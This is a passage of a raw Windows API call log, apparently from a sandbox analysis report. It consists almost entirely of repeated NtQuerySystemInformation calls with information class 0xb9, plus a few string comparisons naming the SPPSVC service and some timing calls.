SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x50, ResultLength=0x0) [0227.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0227.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0227.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0227.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0227.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0227.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0227.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0227.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0227.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0227.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0227.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0227.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2b0, Length=0x20, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2b0, Length=0x20, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0227.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0227.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.601] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd408, Length=0x50, ResultLength=0x0) [0227.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0227.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x28, ResultLength=0x0) [0227.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0227.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0227.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0227.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x28, ResultLength=0x0) [0227.611] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x28, ResultLength=0x0) [0227.612] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0227.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x28, ResultLength=0x0) [0227.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x28, ResultLength=0x0) [0227.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x28, ResultLength=0x0) [0227.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x28, ResultLength=0x0) [0227.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0227.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0227.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x20, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x20, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x20, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.622] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd660 | out: lpSystemTimeAsFileTime=0xc7520fd660*(dwLowDateTime=0xe8f2f1c5, dwHighDateTime=0x1d5fb6e)) [0227.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0227.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0227.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd568, Length=0x50, ResultLength=0x0) [0227.622] GetTickCount () returned 0x117978f [0227.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd438, Length=0x58, ResultLength=0x0) [0227.622] NtQuerySystemInformation (SystemInformationClass=0xb9, 